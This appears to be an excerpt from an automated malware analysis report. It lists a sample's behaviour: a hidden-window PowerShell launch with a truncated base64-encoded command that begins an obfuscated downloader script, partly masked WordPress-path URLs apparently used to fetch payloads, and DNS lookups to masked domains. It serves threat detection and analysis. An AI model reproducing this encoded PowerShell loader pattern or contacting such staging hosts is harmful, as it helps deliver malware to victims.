Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAVABoAHQAaQBnAGQAcQByAHIAcAB0AHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AUAB4AHEAdQBkAHkAawB0ACAAIwA+ACAAJABKAHAAZQBrAHMAdwBoAHAAPQAnAEEAcABtAGcAZABwA...
- http://de#.##ecipart.com/wp-admin/l9s06/
- http://bl##.#egaxis.com/sitehrbk/h597/
- DNS ASK se####karakas.com
- DNS ASK te##.##ibakkendine.com
- DNS ASK de#.##ecipart.com
- DNS ASK te###stack.com
- DNS ASK bl##.#egaxis.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAVABoAHQAaQBnAGQAcQByAHIAcAB0AHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AUAB4AHEAdQBkAHkAawB0ACAAIwA+ACAAJABKAHAAZQBrAHMAdwBoAHAAPQAnAEEAcABtAGcAZABwA...' (with hidden window)